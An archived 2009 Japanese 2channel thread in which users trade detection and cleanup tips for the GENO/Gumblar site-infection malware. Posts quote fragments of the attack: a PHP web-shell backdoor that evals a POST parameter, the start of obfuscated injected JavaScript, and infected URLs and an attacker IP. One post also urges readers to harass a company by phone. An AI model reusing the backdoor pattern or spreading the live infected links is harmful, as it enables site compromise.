GENOウイルススレ　★5

[過去ﾛｸﾞ] GENOウイルススレ　★5 (1001ﾚｽ)
上下前次 1-新

このｽﾚｯﾄﾞは過去ﾛｸﾞ倉庫に格納されています｡
次ｽﾚ検索歴削→次ｽﾚ栞削→次ｽﾚ過去ﾛｸﾞﾒﾆｭｰ

399: 前スレ77 2009/05/16(土) 09:53:01 AAS
>>388
でも、まだ増え続けてるよ

400(1): 2009/05/16(土) 09:53:06 AAS
いや>379も>386も自分です

PCだけウィルス感染してる場合はすぐクリーンインスコ＆パス変更で、
PCもサイトも感染済みの場合は、もうパス抜かれてるんだから
感染拡大防止に鯖のファイルまず全部消した方がいいんじゃないのかと思ったのです

401(1): 2009/05/16(土) 09:53:30 AAS
>>394
前回のインストール用のkis8フォルダが残ってないかチェック

402: 2009/05/16(土) 09:54:45 AAS
>>391
Vista機の購入で解決。
間違っても、安易にXPからVistaにアップしないこと。

403: 2009/05/16(土) 09:56:19 AAS
Vistaでも感染してる人がいるらしいじゃない？

404(3): 2009/05/16(土) 09:59:58 AAS
hXX外部ﾘﾝｸ:www.zengozen.co.jp
も感染確認

405: 2009/05/16(土) 10:00:03 AAS
システムドライブ以外のドライブのデータファイルも改竄されたりするの？

406(2): 2009/05/16(土) 10:01:53 AAS
>>401
ありがとうございます、消せました。
あと最初にカスペのサイト開いた時はまとめwikiのリンクから行ったんですが
wikiおかしくなってるんですよね。
検索かけたいんですがカスペって何て正式名称何だったでしょうか。

407: 2009/05/16(土) 10:04:23 AAS
>>404
GJ　踏んできま～す

408(1): 2009/05/16(土) 10:04:39 AAS
>>406
カスペでぐぐればカスペルスキーがでてくるだろ。
どこまで教えてちゃんなんだよ・・・

409: 2009/05/16(土) 10:04:50 AAS
vista感染した奴は挙手！
uac切ってた？

410(1): 2009/05/16(土) 10:04:57 AAS
カスペルスキー

411(1): 2009/05/16(土) 10:06:45 AAS
>>406
Kaspersky （カスペルスキー）

ジャストシステムのとこでいいのかな？
外部ﾘﾝｸ:www.just-kaspersky.jp

一応カスペWiki
外部ﾘﾝｸ[php]:kaspe.2chv.net

412: 2009/05/16(土) 10:06:48 AAS
>>404
ヤバッ！埋め込まれている！

413: 2009/05/16(土) 10:08:35 AAS
>>404
>>31
あほ？

414: 2009/05/16(土) 10:09:15 AAS
なんだいｗ載ってたやつかｗ

415: 2009/05/16(土) 10:10:52 AAS
放置されてるな

416: 2009/05/16(土) 10:11:10 AAS
４月くらいに再起動できなくなるとか言ってたけど今どうなの？
regeditなんてそうそう使わないから気付かなそう

417: 2009/05/16(土) 10:11:11 AAS
ノ

切ってないけどIｅがアドビの更新頻繁に求めて来た

因みにアバストで検査したけど出てこなかった

バックアップした外付け感染してんのかな…

418: 2009/05/16(土) 10:14:04 AAS
>>408
すみません、先に調べるべきでした。

>>410 >>411
ありがとうございます。

419: 2009/05/16(土) 10:17:00 AAS
avastに乗り換えてスキャンやってるんだが
かなり時間かかるのなこれ

420: 2009/05/16(土) 10:19:17 AAS
ここで出てくるavastってフリー版のやつだよね？　有料版あるのかは知らないけど
avastって他のウイルスに対してはどうなのかな？
avastって良いんだろか？　avastたんがいいのは分かるんだけど

421(1): 2009/05/16(土) 10:19:50 AAS
avastかAVGで昔迷って
AVGだったけど今回からavastになった

422(3): 2009/05/16(土) 10:19:51 AAS
もうブラウザにpdfを表示しないみたいなオプション付けろよ

423(1): 2009/05/16(土) 10:19:58 AAS
>>400
PCだけの感染だけならば多分そう。
ただサイトのも変更されていた場合は、アクセスし削除する前に
自身のPCのhtmlを削除し無いと消している間等で、本人が消したつもりでも
再度なにかが転送される恐れがある。

424: 2009/05/16(土) 10:22:49 AAS
流れ早いお

425(1): 2009/05/16(土) 10:22:53 AAS
カスペってKaspersky Internet Security 2009とKaspersky Anti-Virus 2009、
Kaspersky Anti-Virus for Windows Server 6.0 Home Server Editionのどれがいいんですか？

426(4): 2009/05/16(土) 10:23:29 AAS
>>63でも出てるけど、うちもcmd.exeで実行して
「dir C:\WINDOWS\system32\sqlsodbc.chm」で
エンター押したら「ファイルが見つかりません」って出る。
XPなんだが、ファイル一体どこにいるんだ……。
それともアウアウってこと？

427: 2009/05/16(土) 10:23:58 AAS
>>421
ありがとう
ここ2年くらいカスペ試用版で特にまだ感染とか無いんだけど気になって聞いてみました

428(1): 2009/05/16(土) 10:24:25 AAS
>>426
なんで普通にエクスプローラで見ようと思わないんだよ

429: 2009/05/16(土) 10:24:25 AAS
>>422
Fxならプラグインから無効化出来なかったっけ
てかお前らそもそもPDFなんて読むよむのかよ
AReaderごとアンインストール→smartpdfで良くね

430: 2009/05/16(土) 10:24:35 AAS
>423
なるほど解りました
ありがとう

431(3): 2009/05/16(土) 10:26:36 AAS
そういうときは地道に辿っていくしかないべや
Cドライブ→WINDOWS→system32
で、自分の目でsqlsodbcってファイルを探す

432: 2009/05/16(土) 10:27:16 AAS
>>428
ああありがとう！それでも見られたね！
感染を自己申告したサイトを見ててすげえてんぱってた。
50KBだったのでようやく安心できたよ、有難う！

433: 2009/05/16(土) 10:27:17 AAS
>>431は>>426へのレス

434: 2009/05/16(土) 10:27:49 AAS
このウイルスって万全な対策法がないんだよね。
それじゃクリーンインストールしたところで再感染しそう。。
しかも感染か未感染かを確実に判別する方法がないから、いつまでたっても疑心暗鬼。
めんどくさい。。

435: 2009/05/16(土) 10:28:03 AAS
>>431

436(1): 2009/05/16(土) 10:28:15 AAS
>>422
PDFをブラウザに表示ってAdobe Reader側にある

437: 2009/05/16(土) 10:29:27 AAS
>>426です

>>431さんもありがとう。
てんぱりの余韻で変に安価だけ投稿してしまった。
それでは七誌に戻ります。

438(1): 2009/05/16(土) 10:29:36 AAS
>>425
普通のPCならKaspersky Internet Security 2009

439(1): 2009/05/16(土) 10:31:23 AAS
>>426
同人版のまとめwikiは何かが全角だとかでそのままコピペはダメらしい
同人版のスレ内にコピペが貼ってあるからそれコピペすれば普通にでてきた

440: 2009/05/16(土) 10:32:46 AAS
今回ばかりは対策しないとだめだと思って
昨日の夜からはじめたらもう朝だぜ・・・

441(10): 2009/05/16(土) 10:32:50 AAS
今回のやつとは関係ないけど

うちのavastが反応するんですが、なにこれ
りぶメールってところのサイト
外部ﾘﾝｸ[htm]:www.livmail.com

442: 2009/05/16(土) 10:33:43 AAS
>>438
ありがとうございます！

443: 2009/05/16(土) 10:34:32 AAS
ってかリブメールのトップで反応あり

444(1): 2009/05/16(土) 10:34:54 AAS
>>441
ばっちり関係あります

445(1): 2009/05/16(土) 10:35:15 AAS
h抜きでも飛べるから工夫して貼れっつーの

446: 2009/05/16(土) 10:35:20 AAS
>>439
\　が全角だから

447: 2009/05/16(土) 10:36:28 AAS
regeditはファイル名の先頭がregedの場合動作できないみたいだから
c:\windows\regedit.exeをデスクットップにでもコピーして名前変えて実行すると普通に起動できた

448: 2009/05/16(土) 10:36:53 AAS
441はあぼーん依頼すべきだな

449: 2009/05/16(土) 10:37:09 AAS
工夫して貼ってないとわざとやってると思われるよ
あちらこちらにわざとやってんのいるから

450: 2009/05/16(土) 10:37:40 AAS
>>444
今回のウイルスですか？

>>445
すまそ

451(1): 2009/05/16(土) 10:37:48 AAS
これってCドライブのファイルしか書き換えないんなら外付けHDD買ったときに付いてきたHD革命でCドライブのバックアップイメージ作っといて
もし感染したらイメージ復元で戻せばとりあえず感染前には戻せるんだよね？
フラッシュとアクロバットリーダーは最新にしたけどPCに最初から入ってたバスターではダメっぽいしもうマジで怖いよorz

452: 2009/05/16(土) 10:39:16 AAS
ちなみに　441　は

ドリームメールの　【P貯め～る】ってメールから
リンクされています。
アクセスすると２ポイント

なんです。

453: 2009/05/16(土) 10:39:25 AAS
>>451
つシステムの復元

454: 2009/05/16(土) 10:39:35 AAS
バスターでは他のウイルスでも駄目なの多いからな

455: 2009/05/16(土) 10:39:54 AAS
相変わらずaguseは反応しない。

456(1): 2009/05/16(土) 10:39:59 AAS
>>441
ソースに
(function(){var UkRR='%';var WdBp=('v&61r&20a以下略
と入って居ますね

457: 2009/05/16(土) 10:40:14 AAS
>>441
責任もって削除以来してこい

458(1): 2009/05/16(土) 10:40:28 AAS
Adobe Reader→環境設定→インターネット→PDFをブラウザに表示

PDFをブラウザに表示のチェックも外したほうがいいんじゃない？

459: 2009/05/16(土) 10:40:57 AAS
メールからは感染しないんだよな？

460: 2009/05/16(土) 10:41:44 AAS
HTMLメールに仕込めばいくらでも逝けるんじゃね？

461(1): 2009/05/16(土) 10:42:00 AAS
>>458
だいぶ前からはずすように言われてるよ

462(2): 2009/05/16(土) 10:46:45 AAS
よし、俺がとりあえず>>441にアクセスしてみる
仮想PCだし。画面キャプできたらどっかにうｐしようかな

463(2): 2009/05/16(土) 10:47:10 AAS
>>461
読み直したら･･･
Adobe Reader→環境設定→JavaScript→Acrobat javascriptを使用
を切るしか書いてなかった気がしたから（￣▽￣；）

464: 2009/05/16(土) 10:49:56 AAS
テンプレに反映出来てないんだろうな

465: 2009/05/16(土) 10:50:11 AAS
>>463
もしかしたら前スレかもしれないけど両方はずとくといいって

466(1): 2009/05/16(土) 10:51:51 AAS
>>462
ソースに情報が書き込まれてるって>>456でかいたんだが？

467: 2009/05/16(土) 10:52:24 AAS
ほんとだこのスレには>>436しかないね

468: 2009/05/16(土) 10:53:24 AAS
>>441
うぁぁぁぁぁぁ

469: 2009/05/16(土) 10:53:43 AAS
>>466
いや、ただ試しに踏んでみたいだけ。

470(1): 2009/05/16(土) 10:54:12 AAS
>>441
踏んじまっただろ！！責任取れ！！

471(1): 463 2009/05/16(土) 10:54:37 AAS
一応、自分もこのウィルスの危機にあいかけたので
気づいたところは書きたいと思います

472(1): 2009/05/16(土) 10:54:50 AAS
>>462
やめておいた方がいい
外部ﾘﾝｸ:www.virustotal.com

473(1): 94 101 154 2009/05/16(土) 10:55:04 AAS
>>422
Firefox側にもIE側にもついてるよ。

ところで、例のサイトでブラックリストが更新されたみたい。
あくまで、身内の為のリストらしい（多分、あまり騒ぎ立てて欲しくないっぽい）
感染を全て確認したわけではないし、全ては自己責任の範囲で　らしいが。
俺は今から登録する。

KIS8で質問している人は、デフォルトのまま次々進めてOK
モデム切った状態で、PCを再起動させて、ネットにつないだら、直ぐにパターンファイルを更新。
更新されたら、ネットから切断して、完全スキャンを高設定にして、完全スキャン。

474: 2009/05/16(土) 10:55:35 AAS
>>471
えらい！

475(2): 2009/05/16(土) 11:00:47 AAS
ああ、またカスペ同じ症状出てしまいましたorz
最初に保存する先がデスクトップに設定してしまってるみたいで
ファイル名がデスクトップって日本語が入るせいなんでしょうか。

476(1): 2009/05/16(土) 11:01:15 AAS
最近頻発してるネトゲの垢ハックでもこのウイルスが疑われてるな

477: 2009/05/16(土) 11:02:35 AAS
>>475
たぶん、日本語入ってないとこに移すの忘れずに

478: 463　471 2009/05/16(土) 11:04:28 AAS
あとは･･･sqlsodbc.chmの場所ですが

Vistaの場合はsqlsodbc.chmは
C:\Windows\Help\mui\0409
C:\Windows\Help\mui\0411

のどちらかにあると思います

479(1): 2009/05/16(土) 11:04:29 AAS
もうだめだ！！！！！！！！
インターネット閉鎖してください！！！！！！！！！！

480: 2009/05/16(土) 11:04:31 AAS
>>476
垢ハックの主はzlkon.lvだったから、同じタイプという事で気を付けているのでは無いでしょうか。

481: 2009/05/16(土) 11:06:20 AAS
まだやってんのかよ・・・。

482(1): 2009/05/16(土) 11:06:41 AAS
macを確認したいのですがどうやって調べればいいのでしょうか？

483: 2009/05/16(土) 11:06:46 AAS
>>470
ｗｗｗ。ｌｉｖｍａｉｌ。ｃｏｍ
(株) りぶメール
店舗連絡先: 0120-二五五-八八八

電凸よろ

484(1): 2009/05/16(土) 11:06:58 AAS
インターネット閉鎖できませーん

485: 2009/05/16(土) 11:08:01 AAS
>>479,484
笑わすなｗｗ

486: 94 101 154 2009/05/16(土) 11:08:51 AAS
>>473
の＞デフォルトのまま次々進めてOK
はインストールや再起動後でてくるウィザードの話ね。

>>472
ずっと気になっていたんだが、
これってどうやってスキャンさせてるの？

とりあえず、自分が使ってるセキュリティーソフトに不安な人は、
G-DATAの体験版あたりでしのぐのも手かも（その分重いけど）。
avast と BitDefender のデュアルエンジンだったはず。
外部ﾘﾝｸ:www.junglejapan.com
メール登録あり。

>>475
状況が分からん。
どこまではやったのか書いてくれ。
俺がやった時は、セットアップファイルのフォルダの場所を日本語を含まない場所に変更したら、大丈夫だったぞ。
解凍した時に自動で出来るフォルダも怪しいから、ドライブ直下に半角英数フォルダ作り直して、
解凍して出てきたファイルを移動させてみて。　

487(1): 2009/05/16(土) 11:09:22 AAS
sqlsodbc.chmが見つからないと言ってる人は
ファイル検索ソフトでも使えば？
Everythingとかいろいろあるでしょ

488: 2009/05/16(土) 11:10:14 AAS
これってファイルにも感染しますか？
大事なのを外付けに避難させてるんだけど、リカバリした後にファイルをパソコンに入れたらまた感染？

489(4): 2009/05/16(土) 11:10:31 AAS
うちのサーバも書き換えられてたんで、いろいろファイル見てたんだがこんなのが見つかった
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode
から始まる、2450文字くらいあるんでここに書けないんで一部だけ。
FTPの情報によると5月8日に更新されたファイルのようだ
GENO関係ない？php使ってjavascript書かれてるんだが。unescapeとかも見える

どこかに全文貼ったほうがいい？詳しい人いる？

490(1): 2009/05/16(土) 11:12:54 AAS
>>489
それアウトだな。

491(3): 2009/05/16(土) 11:13:28 AAS
書こうと思ったらもう載ってた
外部ﾘﾝｸ:www3.atword.jp
緊急のとこね
>>441はmartuzに飛ばされるから

492(1): 2009/05/16(土) 11:15:20 AAS
あの～、皆様にお尋ねしたいのですが、先日から私のPCにインストールしてある
adobe acrobat9.0が勝手に閉じてしまうのですが、原因わかる方おられないでしょうか？
ネットでいろいろ検索してみたところ、ここで「勝手に起動する」とありましたので、
何らかの関連性があると思いカキコしました。詳しく言うと、acrobatを起動して、数秒後
に勝手に閉じてしまいます。もしかしてこのGENOウィルスが原因なんでしょうか？
そもそもGENOウィルスって何ですか？もしそれが原因なら、対処方法はあるのですか？
素人で大変申し訳ありませんが、宜しくお願いします。

493: 2009/05/16(土) 11:15:23 AAS
>>482
Vistaユーザーだからmacはわからないです＞＜

494: 2009/05/16(土) 11:17:06 AAS
>>492
まずはこのスレを最初から読もうね

495(1): 2009/05/16(土) 11:19:13 AAS
>>489
それ・・・アウト。
どこかにgumblarとか書かれて無いかな？

496: 2009/05/16(土) 11:20:09 AAS
質問スレって無いんだっけ
混在しちゃうと読みづらい

497: 2009/05/16(土) 11:22:53 AAS
俺なんてTシャツ着て転げまわるから空拭きの雑巾要らない

498(1): 2009/05/16(土) 11:24:45 AAS
Adobe Reader をアンスコすれば解決すんの？
使わないしイラネーな

499(1): 489 2009/05/16(土) 11:25:00 AAS
>>490,495
今まで見たヤツはgumblarとか書いてあったがこれはない
base64でエンコードされてるからだけどね

500: 2009/05/16(土) 11:25:50 AAS
>>498
フラッシュプレイヤーも

501: 2009/05/16(土) 11:26:00 AAS
ちょ、なんだよ。前スレ落ちたな～なんて思って寝たら、もうこんなにスレ進んでんのかよ。

502: 2009/05/16(土) 11:26:25 AAS
evalとunescapeの両方があったらほぼ確定じゃないかな

>>441
大当たり　比較的最近の型かな

503: 2009/05/16(土) 11:27:53 AAS
それカスペでも反応する？

504: 2009/05/16(土) 11:29:17 AAS
>>499
んじゃ>>491の
martuzとかは？

505: 94 101 154 2009/05/16(土) 11:29:56 AAS
>>491
Nice!

506: 2009/05/16(土) 11:30:22 AAS
おもしれえなこのスレｗ

507(1): 2009/05/16(土) 11:30:24 AAS
ちょっと何この速さ
いつの間に5いってんの・・・
バグ？だれか説明してくれ

508(2): 2009/05/16(土) 11:31:44 AAS
PeerGurdianで、危険IP弾いてるんだけど
IP一覧みたいなまとめって、どこかあるんだっけ
94.247.2.195だけ？

509(1): 2009/05/16(土) 11:31:50 AAS
Avira AntiVirを導入してるから安心してみておける

510: 2009/05/16(土) 11:32:20 AAS
>>441
これ踏むとどうなるの？

511: 2009/05/16(土) 11:32:38 AAS
勿論感染

512: 改ざんされたソース 2009/05/16(土) 11:33:00 AAS
814 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/16(土) 03:13:30
>>732　なるほど

恐らくこれだな

スクリプト language=ジャバcriptスクリプト
スクリプト language=ジャバscript>スクリプト

以上、前スレから転載
ドットがアンダーバーに変わっている亜種もあるっぽい

513(1): 2009/05/16(土) 11:33:39 AAS
>>508
>>380

514: 2009/05/16(土) 11:34:01 AAS
>>508
>>380

515: 2009/05/16(土) 11:34:43 AAS
>>513
サンキュ、助かった

516: 2009/05/16(土) 11:34:56 AAS
22秒撃ち負けたｗ

517: 2009/05/16(土) 11:35:43 AAS
改竄が読めません!

518(3): 2009/05/16(土) 11:35:47 AAS
Googleが実現させたシンプルで高機能なブラウザ
外部ﾘﾝｸ[html]:www.google.co.jp

WindowsXPを利用の初心者はこのブラウザでOK！
感染したサイトや、危険なURLを開くとブラウザが危険を知らせてくれます。
Vistaでは埋め込まれたJSに反応しないため危険警告は出ずそのサイトが表示します。

上級者にはFirefoxの設定変更で回避する方法がおすすめです。

519(1): 2009/05/16(土) 11:36:21 AAS
>>509
擦り抜けるつってんだろ

520(1): 2009/05/16(土) 11:37:04 AAS
なんかもう順番に読んでくのメンドイ；；；
読むより早くスレが進んでいくよーT-T
こんなの実況スレ以来だよ―――――っ。

521(1): 2009/05/16(土) 11:37:13 AAS
avastが株上げたな
無料の分際でやるわねなんて思っていないんだからねっ

522: 2009/05/16(土) 11:38:20 AAS
何で勢いこんなにあがったのかと思ったら同人サイトも改変されちゃったのね

523: 2009/05/16(土) 11:38:24 AAS
同人スレのまとめの人も混乱してやがる＼(^o^)／

524(4): 2009/05/16(土) 11:38:41 AAS
感染サイト
hxxp://expss.main.jp/expss2/2005/07/

525(2): 2009/05/16(土) 11:38:58 AAS
>>518
>上級者にはFirefoxの設定変更で回避する方法がおすすめです

詳しくお願い

上下前次 1-新書関写板覧索設栞歴

あと 476 ﾚｽあります
ｽﾚ情報赤ﾚｽ抽出画像ﾚｽ抽出歴の未読ｽﾚ

ぬこの手ぬこTOP 0.023s